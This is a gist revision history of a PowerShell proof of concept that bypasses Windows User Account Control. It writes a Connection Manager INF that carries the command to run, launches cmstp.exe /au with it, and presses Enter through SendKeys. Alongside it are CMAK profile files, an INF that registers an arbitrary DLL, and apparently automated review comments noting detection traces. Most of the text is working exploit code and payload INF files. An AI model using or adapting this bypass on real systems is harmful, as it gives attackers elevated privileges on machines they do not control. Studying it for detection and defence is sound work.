Revisions
Tyler Applebaum revised this gist
Aug 21, 2017 . 1 changed file with 1 addition and 0 deletions.
@@ -1,3 +1,4 @@ ; No longer needed - embedded in script now [version] Signature=$chicago$ AdvancedINF=2.5
Tyler Applebaum revised this gist
Aug 21, 2017 . 1 changed file with 45 additions and 6 deletions.
@@ -5,8 +5,46 @@ # Todo: Hide window on screen for stealth # Todo: Make script edit the INF file for command to inject... Function script:Set-INFFile { [CmdletBinding()] Param ( [Parameter(HelpMessage="Specify the INF file location")] $InfFileLocation = "$env:temp\CMSTP.inf", [Parameter(HelpMessage="Specify the command to launch in a UAC-privileged window")] [String]$CommandToExecute = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ) $InfContent = @" [version] Signature=`$chicago`$ AdvancedINF=2.5 [DefaultInstall] CustomDestination=CustInstDestSectionAllUsers RunPreSetupCommands=RunPreSetupCommandsSection [RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install $CommandToExecute taskkill /IM cmstp.exe /F [CustInstDestSectionAllUsers] 49000,49001=AllUSer_LDIDSection, 7 [AllUSer_LDIDSection] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "" [Strings] ServiceName="CorpVPN" ShortSvcName="CorpVPN" "@ $InfContent | Out-File $InfFileLocation -Encoding ASCII } Function Get-Hwnd { @@ -75,13 +113,13 @@ function Set-WindowActive } } . Set-INFFile #Needs Windows forms add-type -AssemblyName System.Windows.Forms If (Test-Path $InfFileLocation) { #Command to run $ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe" $ps.Arguments = "/au $InfFileLocation" $ps.UseShellExecute = $false #Start it @@ -98,4 +136,5 @@ until ((Set-WindowActive cmstp).Hwnd -ne 0) Set-WindowActive cmstp #Send the Enter key [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") }
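Review bot: `Set-INFFile` has no comment-based help, and nothing explains that the dot-sourced call `. Set-INFFile` is what keeps `$InfFileLocation` in scope for the later `Test-Path $InfFileLocation` and `$ps.Arguments` lines. A comment above the call such as `# Dot-sourced so the Param default $InfFileLocation stays in scope for the cmstp launch below` would record that dependency. The help block should also say that `$CommandToExecute` is written verbatim into `[RunPreSetupCommandsSection]` of an INF at `$env:temp\CMSTP.inf`, and that no visible line removes the file afterwards. For anyone triaging a host, that file together with a `cmstp.exe /au` process start (catalogued as MITRE ATT&CK T1218.003) is the observable footprint. The script body between the hunks is outside this view.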
Tyler Applebaum revised this gist
Aug 21, 2017 . 4 changed files with 1 addition and 679 deletions.
@@ -1,6 +0,0 @@
@@ -1,115 +0,0 @@
@@ -1,290 +0,0 @@
@@ -1,289 +1,22 @@ [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall] CustomDestination=CustInstDestSectionAllUsers RunPreSetupCommands=RunPreSetupCommandsSection [RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe taskkill /IM cmstp.exe /F [CustInstDestSectionAllUsers] 49000,49001=AllUSer_LDIDSection, 7 [AllUSer_LDIDSection] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "" [Strings] ServiceName="CorpVPN" ShortSvcName="CorpVPN"
Oddvar Moe created this gist
Aug 15, 2017 .
@@ -0,0 +1,6 @@ [Profile Format] Version=5 [Connection Manager] CMSFile=CorpVPN\CorpVPN.cms ConnectionType=1
@@ -0,0 +1,115 @@ [Profile Format] Version=5 [ISP] PBFile=CorpVPN\CorpBook.pbk RegionFile=CorpVPN\CorpBook.pbr PBURL=http://msitpros.com/pbserver/pbserver.dll Mask&SignOn=0x0001 Match&SignOn=0x0000 Mask&SignUp=0x0002 Match&SignUp=0x0002 Mask&Modem=0x0004 Match&Modem=0x0000 Mask&ISDN=0x0008 Match&ISDN=0x0000 Mask&Custom1=0x0010 Match&Custom1=0x0010 Mask&Custom2=0x0080 Match&Custom2=0x0080 Mask&MultiCast=0x0020 Match&MultiCast=0x0000 Mask&Surcharge=0x0040 Match&Surcharge=0x0040 Mask&MultiCastModem=0x0024 Match&MultiCastModem=0x0000 Mask&MultiCastISDN=0x0028 Match&MultiCastISDN=0x0000 Mask&NosurchargeSignon=0x0041 Match&NosurchargeSignon=0x0000 Mask&SurchargeSignon=0x0041 Match&SurchargeSignon=0x0040 FilterA&=NosurchargeSignon FilterB&=SurchargeSignon [Service Types] Modem=Modem ISDN=ISDN Modem MultiCast=MultiCastModem ISDN MultiCast=MultiCastISDN [Connection Manager] RedialCount=3 RedialDelay=5 Version=0 DownloadDelay=15 ServiceName=CorpVPN ServiceMessage= PBMessage= DUN=CorpVPN UserNamePrefix= UserNameSuffix= PasswordHandling=0 Logo= Icon= SmallIcon= TrayIcon= PBLogo= Dialup=1 Direct=1 ConnectionType=0 Tunnel=0 TunnelReferences=0 HelpFile= SecureRoutingCompartment=0 [Animated Logo] [Animation Actions] [Pre-Init Actions] [Pre-Connect Actions] [Pre-Dial Actions] [Pre-Tunnel Actions] [Connect Actions] 0=cmdl32.exe %PROFILE% 0&Flags=16 [Auto Applications] [Disconnect Actions] [On-Cancel Actions] [On-Error Actions] [Menu Options] [Server&CorpVPN] SW_Compress=1 Disable_LCP=0 Negotiate_TCP/IP=1 Negotiate_TCP/IPv6=1 SecureLocalFiles=0 EnforceCustomSecurity=0 Custom_Security=1 Require_PAP=0 Require_SPAP=0 Require_CHAP=1 Require_MSCHAP=0 Require_MSCHAP2=1 Require_W95MSCHAP=0 EncryptionType=3 PW_Encrypt=1 PW_EncryptMS=0 DataEncrypt=0 [TCP/IP&CorpVPN] IP_Header_Compress=1 Gateway_On_Remote=1 IPv6_Gateway_On_Remote=1 Specify_Server_Address=0 IPv6_Specify_Server_Address=0
@@ -0,0 +1,290 @@ ;=========================================================================== ; ; All of the customizable sections of this file are in the [Strings] section ; at the bottom. ; ;=========================================================================== [version] Signature=$chicago$ AdvancedINF=2.5 [CmDial32.Dll] Version=458754 Build=943259648 ; ------------------------------------------------------------------- ; All User Installs ; ------------------------------------------------------------------- [DefaultInstall] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers RunPreSetupCommands=RunPreSetupCommandsSection ;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM ;AddReg=Xnstall.AddReg.AllUsers RegisterOCXs=RegisterOCXSection ; ------------------------------------------------------------------- ; Launches the All User postinstall commands ; ------------------------------------------------------------------- [PostInstall] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers RunPostSetupCommands=RunPostSetupCommandsSection ; ------------------------------------------------------------------- ; Single User Installs ; ------------------------------------------------------------------- [DefaultInstall_SingleUser] SmartReboot=N CustomDestination=CustInstDestSectionSingleUsers RunPreSetupCommands=RunPreSetupCommandsSection CopyFiles=Xnstall.CopyFiles.SingleUser, Xnstall.CopyFiles.ICM AddReg = Xnstall.AddReg.Private RegisterOCXs=RegisterOCXSection ; ------------------------------------------------------------------- ; Launches the Single User postinstall commands ; ------------------------------------------------------------------- [PostInstall_Single] SmartReboot=N CustomDestination=CustInstDestSectionSingleUsers RunPostSetupCommands=RunPostSetupCommandsSection ; ------------------------------------------------------------------- ; This file section sets up the desktop icon GUID and is thus ; only needed on legacy systems. 
; ------------------------------------------------------------------- [Xnstall_Legacy] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers AddReg=Xnstall.AddReg.DesktopIcon, Xnstall.AddReg.Icon ; These section are kept for legacy compatibility but are no longer used. [Xnstall_Private] [Xnstall_AllUser] ; ------------------------------------------------------------------- ; Section used to uninstall Private user profiles ; ------------------------------------------------------------------- [Remove_Private] Cleanup=1 SmartReboot=N BeginPrompt=RemoveBeginPromptSection EndPrompt=RemoveEndPromptSection RunPreSetupCommands=RunPreUnInstCommandsSection CustomDestination=CustUnInstDestSectionPrivate DelFiles=Remove.DelFiles, Remove.DelFiles.ICM DelReg=Remove.DelReg.Private DelDirs=CleanDir RunPostSetupCommands=RunPostUnInstCommandsSection ; ------------------------------------------------------------------- ; Section used to uninstall All User profiles ; ------------------------------------------------------------------- [Remove] Cleanup=1 SmartReboot=N BeginPrompt=RemoveBeginPromptSection EndPrompt=RemoveEndPromptSection RunPreSetupCommands=RunPreUnInstCommandsSection CustomDestination=CustUninstDestSectionAllUsers DelFiles=Remove.DelFiles, Remove.DelFiles.ICM DelReg=Remove.DelReg.AllUser DelDirs=CleanDir RunPostSetupCommands=RunPostUnInstCommandsSection ; The following Run(Pre/Post)SetupCommandsSections allow you to run commands before or ; after the profile is installed. ; ; Similarly the following Run(Pre/Post)UnInstCommandsSections will allow you to run ; commands before or after the profile is uninstalled. 
; ; An example command line is: ; Myprogram.exe /<switches> <options> [RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install [RunPostSetupCommandsSection] ;Commands here will be run After setup finishes [RunPreUnInstCommandsSection] ;Commands here will be run before Uninstall Begins [RunPostUnInstCommandsSection] ;Commands here will be run after Uninstall Finishes [RegisterOCXSection] c:\cmstp\AllTheThings.dll ; ------------------------------------------------------------------- ; These are the registry entries for installation. ; ------------------------------------------------------------------- [Xnstall.AddReg.DesktopIcon] "HKCR", "CLSID\%DesktopGUID%",,,"%ServiceName%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%",,"0x00001000","%ServiceName%" "HKCR", "CLSID\%DesktopGUID%\ShellFolder","Attributes",1,"00","00","00","00" ; Please make sure the following three commands are alphabetized by the %Open%, %Delete%, ; and %Settings% entries defined in the Strings section ; the Connect Command "HKCR", "CLSID\%DesktopGUID%\Shell\Open\Command",,,"cmmgr32.exe ""%49000%\%ShortSvcName%.cmp""" "HKCR", "CLSID\%DesktopGUID%\Shell\Open",,,"%Open%" ; the Delete Command "HKCR", "CLSID\%DesktopGUID%\Shell\Delete\Command",,,"cmstp.exe /u ""%49000%\%ShortSvcName%\%ShortSvcName%.inf""" "HKCR", "CLSID\%DesktopGUID%\Shell\Delete",,,"%Delete%" ; the Properties Command "HKCR", "CLSID\%DesktopGUID%\Shell\Settings...\Command",,,"cmmgr32.exe /settings ""%49000%\%ShortSvcName%.cmp""" "HKCR", "CLSID\%DesktopGUID%\Shell\Settings...",,,"%Settings%" [Xnstall.AddReg.AllUsers] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "0x00001000", "%49001%" "HKLM", "%AppAct%\Mappings","%ServiceName%","0x00001000","%49001%\%ShortSvcName%.cmp" [Xnstall.AddReg.Private] ; Single User Mappings is now written in code. 
;"HKCU", "%AppAct%\Mappings","%ServiceName%","","%%UserProfile%%\%PathFromProfileDir%\%ShortSvcName%.cmp" ; ------------------------------------------------------------------- ; These are the registry settings which ; are deleted during uninstall. ; ------------------------------------------------------------------- [Remove.DelReg.AllUser] "HKLM", "%AppAct%\%ServiceName%" "HKLM", "%AppAct%\Mappings","%ServiceName%" "HKCU", "%AppAct%\UserInfo\%ServiceName%" "HKCR", "CLSID\%DesktopGUID%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%" [Remove.DelReg.Private] "HKCU", "%AppAct%\%ServiceName%" "HKCU", "%AppAct%\Mappings","%ServiceName%" "HKCU", "%AppAct%\SingleUserInfo\%ServiceName%" "HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%" [CleanDir] %49001%\%ShortSvcName% ; ------------------------------------------------------------------- ; These are the directory specifications. 
; ------------------------------------------------------------------- [CustInstDestSectionAllUsers] 49000,49001=AllUSer_LDIDSection, 7 [CustInstDestSectionSingleUsers] 49000,49001=SingleUser_LDIDSection, 7 [CustUninstDestSectionAllUsers] 49000,49001=XConnMgrLDIDSectionAllUsers, 5 [CustUnInstDestSectionPrivate] 49000,49001=XConnMgrLDIDSectionPrivate, 5 [SingleUser_LDIDSection] "HKCU", "%AppAct%", "ProfileInstallPath", "%UnexpectedError%", "" [AllUSer_LDIDSection] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "" [XConnMgrLDIDSectionAllUsers] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "" [XConnMgrLDIDSectionPrivate] "HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "" [DestinationDirs] Xnstall.CopyFiles=49001, %ShortSvcName% Xnstall.CopyFiles.SingleUser=49001, %ShortSvcName% Xnstall.CopyFiles.ICM=49001 Remove.DelFiles=49001, %ShortSvcName% Remove.DelFiles.ICM=49001 [SourceDisksNames] 55=, , 0 ; ------------------------------------------------------------------- ; These are the Prompt Sections ; ------------------------------------------------------------------- [RemoveBeginPromptSection] Prompt=%BeginPrompt% ButtonType=YESNO Title=%UninstallAppTitle% [RemoveEndPromptSection] Prompt=%EndPrompt% [Strings] ; ------------------------------------------------------------------- ; These are the non localizable strings... ; ------------------------------------------------------------------- KEY_RENAME = "Software\Microsoft\Windows\CurrentVersion\RenameFiles" AppAct = "SOFTWARE\Microsoft\Connection Manager" ; ------------------------------------------------------------------- ; These are the localizable strings... ; ------------------------------------------------------------------- UnexpectedError = "An unexpected error occurred. Please reboot and try the installation again." 
; When you localize these commands (they are the commands for the Desktop Icon on legacy ; platforms) you must make sure to re-alphabetize the Registry add calls above. Win95 ; shows the menus in the order they were added and doesn't alphabetize them for you. Settings = "P&roperties" Open = "C&onnect" Delete = "&Delete" ; ------------------------------------------------------------------- ; The following strings are set by the Connection Manager Administration Kit ; Do not change any of the following strings ; ------------------------------------------------------------------- ServiceName="CorpVPN" ShortSvcName="CorpVPN" DesktopGUID="{46E030C3-DC6A-4251-80A3-E3E2753FF0E2}" UninstallAppTitle="CorpVPN" DesktopIcon="" PhonebookPath="" BeginPrompt="Do you want to remove CorpVPN?" EndPrompt="Successfully removed CorpVPN." DisplayLCID=1033 CmLCID=1033 Allow32bit=0 [CMAK Status] InfVersion=5 PhoneName=CorpBook LicenseFile= IncludeCMCode=0 UpdatePhonebook=1 [Extra Files] [Merge Profiles] [Xnstall.AddReg.Icon] HKCR,"CLSID\%DesktopGUID%\DefaultIcon",,,"%11%\CMMGR32.EXE,0" [Xnstall.CopyFiles.SingleUser] CorpVPN.cms,,,4 CorpVPN.inf [Xnstall.CopyFiles] CorpVPN.cms,,,4 CorpVPN.inf [Xnstall.CopyFiles.ICM] CorpVPN.cmp [Remove.DelFiles.ICM] CorpVPN.cmp [SourceDisksFiles] CorpVPN.inf = 55 CorpVPN.cmp = 55 CorpVPN.cms = 55 [Remove.DelFiles] CorpVPN.cms
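Review bot: The header comment says all customizable sections are in `[Strings]`, yet the entries that matter in this file sit elsewhere and nothing marks them. Here the active entry appears to be `[RegisterOCXSection] c:\cmstp\AllTheThings.dll`, referenced by `RegisterOCXs=RegisterOCXSection` under both install sections; in the next file of this revision it is the two command lines under `[RunPreSetupCommandsSection]`. A one-line comment above each, for example `; non-template entry: acted on by cmstp.exe during profile install`, would make that explicit. Those two section types are also the first place to look when an unfamiliar INF turns up as a cmstp.exe argument.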
@@ -0,0 +1,289 @@ ;=========================================================================== ; ; All of the customizable sections of this file are in the [Strings] section ; at the bottom. ; ;=========================================================================== [version] Signature=$chicago$ AdvancedINF=2.5 [CmDial32.Dll] Version=458754 Build=943259648 ; ------------------------------------------------------------------- ; All User Installs ; ------------------------------------------------------------------- [DefaultInstall] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers RunPreSetupCommands=RunPreSetupCommandsSection ;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM ;AddReg=Xnstall.AddReg.AllUsers RegisterOCXs=RegisterOCXSection ; ------------------------------------------------------------------- ; Launches the All User postinstall commands ; ------------------------------------------------------------------- [PostInstall] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers RunPostSetupCommands=RunPostSetupCommandsSection ; ------------------------------------------------------------------- ; Single User Installs ; ------------------------------------------------------------------- [DefaultInstall_SingleUser] SmartReboot=N CustomDestination=CustInstDestSectionSingleUsers RunPreSetupCommands=RunPreSetupCommandsSection CopyFiles=Xnstall.CopyFiles.SingleUser, Xnstall.CopyFiles.ICM AddReg = Xnstall.AddReg.Private RegisterOCXs=RegisterOCXSection ; ------------------------------------------------------------------- ; Launches the Single User postinstall commands ; ------------------------------------------------------------------- [PostInstall_Single] SmartReboot=N CustomDestination=CustInstDestSectionSingleUsers RunPostSetupCommands=RunPostSetupCommandsSection ; ------------------------------------------------------------------- ; This file section sets up the desktop icon GUID and is thus ; only needed on legacy systems. 
; ------------------------------------------------------------------- [Xnstall_Legacy] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers AddReg=Xnstall.AddReg.DesktopIcon, Xnstall.AddReg.Icon ; These section are kept for legacy compatibility but are no longer used. [Xnstall_Private] [Xnstall_AllUser] ; ------------------------------------------------------------------- ; Section used to uninstall Private user profiles ; ------------------------------------------------------------------- [Remove_Private] Cleanup=1 SmartReboot=N BeginPrompt=RemoveBeginPromptSection EndPrompt=RemoveEndPromptSection RunPreSetupCommands=RunPreUnInstCommandsSection CustomDestination=CustUnInstDestSectionPrivate DelFiles=Remove.DelFiles, Remove.DelFiles.ICM DelReg=Remove.DelReg.Private DelDirs=CleanDir RunPostSetupCommands=RunPostUnInstCommandsSection ; ------------------------------------------------------------------- ; Section used to uninstall All User profiles ; ------------------------------------------------------------------- [Remove] Cleanup=1 SmartReboot=N BeginPrompt=RemoveBeginPromptSection EndPrompt=RemoveEndPromptSection RunPreSetupCommands=RunPreUnInstCommandsSection CustomDestination=CustUninstDestSectionAllUsers DelFiles=Remove.DelFiles, Remove.DelFiles.ICM DelReg=Remove.DelReg.AllUser DelDirs=CleanDir RunPostSetupCommands=RunPostUnInstCommandsSection ; The following Run(Pre/Post)SetupCommandsSections allow you to run commands before or ; after the profile is installed. ; ; Similarly the following Run(Pre/Post)UnInstCommandsSections will allow you to run ; commands before or after the profile is uninstalled. 
; ; An example command line is: ; Myprogram.exe /<switches> <options> [RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install c:\windows\system32\cmd.exe taskkill /IM cmstp.exe /F [RunPostSetupCommandsSection] ;Commands here will be run After setup finishes [RunPreUnInstCommandsSection] ;Commands here will be run before Uninstall Begins [RunPostUnInstCommandsSection] ;Commands here will be run after Uninstall Finishes ; ------------------------------------------------------------------- ; These are the registry entries for installation. ; ------------------------------------------------------------------- [Xnstall.AddReg.DesktopIcon] "HKCR", "CLSID\%DesktopGUID%",,,"%ServiceName%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%",,"0x00001000","%ServiceName%" "HKCR", "CLSID\%DesktopGUID%\ShellFolder","Attributes",1,"00","00","00","00" ; Please make sure the following three commands are alphabetized by the %Open%, %Delete%, ; and %Settings% entries defined in the Strings section ; the Connect Command "HKCR", "CLSID\%DesktopGUID%\Shell\Open\Command",,,"cmmgr32.exe ""%49000%\%ShortSvcName%.cmp""" "HKCR", "CLSID\%DesktopGUID%\Shell\Open",,,"%Open%" ; the Delete Command "HKCR", "CLSID\%DesktopGUID%\Shell\Delete\Command",,,"cmstp.exe /u ""%49000%\%ShortSvcName%\%ShortSvcName%.inf""" "HKCR", "CLSID\%DesktopGUID%\Shell\Delete",,,"%Delete%" ; the Properties Command "HKCR", "CLSID\%DesktopGUID%\Shell\Settings...\Command",,,"cmmgr32.exe /settings ""%49000%\%ShortSvcName%.cmp""" "HKCR", "CLSID\%DesktopGUID%\Shell\Settings...",,,"%Settings%" [Xnstall.AddReg.AllUsers] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "0x00001000", "%49001%" "HKLM", "%AppAct%\Mappings","%ServiceName%","0x00001000","%49001%\%ShortSvcName%.cmp" [Xnstall.AddReg.Private] ; Single User Mappings is now written in code. 
;"HKCU", "%AppAct%\Mappings","%ServiceName%","","%%UserProfile%%\%PathFromProfileDir%\%ShortSvcName%.cmp" ; ------------------------------------------------------------------- ; These are the registry settings which ; are deleted during uninstall. ; ------------------------------------------------------------------- [Remove.DelReg.AllUser] "HKLM", "%AppAct%\%ServiceName%" "HKLM", "%AppAct%\Mappings","%ServiceName%" "HKCU", "%AppAct%\UserInfo\%ServiceName%" "HKCR", "CLSID\%DesktopGUID%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%" [Remove.DelReg.Private] "HKCU", "%AppAct%\%ServiceName%" "HKCU", "%AppAct%\Mappings","%ServiceName%" "HKCU", "%AppAct%\SingleUserInfo\%ServiceName%" "HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%" [CleanDir] %49001%\%ShortSvcName% ; ------------------------------------------------------------------- ; These are the directory specifications. 
; ------------------------------------------------------------------- [CustInstDestSectionAllUsers] 49000,49001=AllUSer_LDIDSection, 7 [CustInstDestSectionSingleUsers] 49000,49001=SingleUser_LDIDSection, 7 [CustUninstDestSectionAllUsers] 49000,49001=XConnMgrLDIDSectionAllUsers, 5 [CustUnInstDestSectionPrivate] 49000,49001=XConnMgrLDIDSectionPrivate, 5 [SingleUser_LDIDSection] "HKCU", "%AppAct%", "ProfileInstallPath", "%UnexpectedError%", "" [AllUSer_LDIDSection] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "" [XConnMgrLDIDSectionAllUsers] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "" [XConnMgrLDIDSectionPrivate] "HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "" [DestinationDirs] Xnstall.CopyFiles=49001, %ShortSvcName% Xnstall.CopyFiles.SingleUser=49001, %ShortSvcName% Xnstall.CopyFiles.ICM=49001 Remove.DelFiles=49001, %ShortSvcName% Remove.DelFiles.ICM=49001 [SourceDisksNames] 55=, , 0 ; ------------------------------------------------------------------- ; These are the Prompt Sections ; ------------------------------------------------------------------- [RemoveBeginPromptSection] Prompt=%BeginPrompt% ButtonType=YESNO Title=%UninstallAppTitle% [RemoveEndPromptSection] Prompt=%EndPrompt% [Strings] ; ------------------------------------------------------------------- ; These are the non localizable strings... ; ------------------------------------------------------------------- KEY_RENAME = "Software\Microsoft\Windows\CurrentVersion\RenameFiles" AppAct = "SOFTWARE\Microsoft\Connection Manager" ; ------------------------------------------------------------------- ; These are the localizable strings... ; ------------------------------------------------------------------- UnexpectedError = "An unexpected error occurred. Please reboot and try the installation again." 
; When you localize these commands (they are the commands for the Desktop Icon on legacy ; platforms) you must make sure to re-alphabetize the Registry add calls above. Win95 ; shows the menus in the order they were added and doesn't alphabetize them for you. Settings = "P&roperties" Open = "C&onnect" Delete = "&Delete" ; ------------------------------------------------------------------- ; The following strings are set by the Connection Manager Administration Kit ; Do not change any of the following strings ; ------------------------------------------------------------------- ServiceName="CorpVPN" ShortSvcName="CorpVPN" DesktopGUID="{46E030C3-DC6A-4251-80A3-E3E2753FF0E2}" UninstallAppTitle="CorpVPN" DesktopIcon="" PhonebookPath="" BeginPrompt="Do you want to remove CorpVPN?" EndPrompt="Successfully removed CorpVPN." DisplayLCID=1033 CmLCID=1033 Allow32bit=0 [CMAK Status] InfVersion=5 PhoneName=CorpBook LicenseFile= IncludeCMCode=0 UpdatePhonebook=1 [Extra Files] [Merge Profiles] [Xnstall.AddReg.Icon] HKCR,"CLSID\%DesktopGUID%\DefaultIcon",,,"%11%\CMMGR32.EXE,0" [Xnstall.CopyFiles.SingleUser] CorpVPN.cms,,,4 CorpVPN.inf [Xnstall.CopyFiles] CorpVPN.cms,,,4 CorpVPN.inf [Xnstall.CopyFiles.ICM] CorpVPN.cmp [Remove.DelFiles.ICM] CorpVPN.cmp [SourceDisksFiles] CorpVPN.inf = 55 CorpVPN.cmp = 55 CorpVPN.cms = 55 [Remove.DelFiles] CorpVPN.cms
@@ -0,0 +1,101 @@ # UAC Bypass poc using SendKeys # Version 1.0 # Author: Oddvar Moe # Functions borrowed from: https://powershell.org/forums/topic/sendkeys/ # Todo: Hide window on screen for stealth # Todo: Make script edit the INF file for command to inject... # Point this to your INF file containing your juicy commands... $InfFile = "c:\cmstp\UACBypass.inf" Function Get-Hwnd { [CmdletBinding()] Param ( [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $ProcessName ) Process { $ErrorActionPreference = 'Stop' Try { $hwnd = Get-Process -Name $ProcessName | Select-Object -ExpandProperty MainWindowHandle } Catch { $hwnd = $null } $hash = @{ ProcessName = $ProcessName Hwnd = $hwnd } New-Object -TypeName PsObject -Property $hash } } function Set-WindowActive { [CmdletBinding()] Param ( [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $Name ) Process { $memberDefinition = @' [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd); '@ Add-Type -MemberDefinition $memberDefinition -Name Api -Namespace User32 $hwnd = Get-Hwnd -ProcessName $Name | Select-Object -ExpandProperty Hwnd If ($hwnd) { $onTop = New-Object -TypeName System.IntPtr -ArgumentList (0) [User32.Api]::SetForegroundWindow($hwnd) [User32.Api]::ShowWindow($hwnd, 5) } Else { [string] $hwnd = 'N/A' } $hash = @{ Process = $Name Hwnd = $hwnd } New-Object -TypeName PsObject -Property $hash } } #Needs Windows forms add-type -AssemblyName System.Windows.Forms #Command to run $ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe" #$ps.Arguments = "/au c:\cmstp\UACBypass.inf" $ps.Arguments = "/au $InfFile" $ps.UseShellExecute = $false #Start it [system.diagnostics.process]::Start($ps) do { # Do nothing until cmstp is an active window } until ((Set-WindowActive cmstp).Hwnd -ne 0) #Activate 
window Set-WindowActive cmstp #Send the Enter key [System.Windows.Forms.SendKeys]::SendWait("{ENTER}")
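Review bot: In `Set-WindowActive`, `$onTop` is assigned from `New-Object -TypeName System.IntPtr -ArgumentList (0)` and never read, so that line can be dropped. Neither `Get-Hwnd` nor `Set-WindowActive` has comment-based help, although the header credits them as borrowed code; a short `.SYNOPSIS` and `.OUTPUTS` on each, naming the `ProcessName`/`Process` and `Hwnd` properties of the returned object, would let them be read without tracing the body. The `$InfFile` value `c:\cmstp\UACBypass.inf` is a fixed absolute path whose only explanation is the comment above it; stating there that this path is handed to `cmstp.exe /au` would tie the setting to the one place it is used.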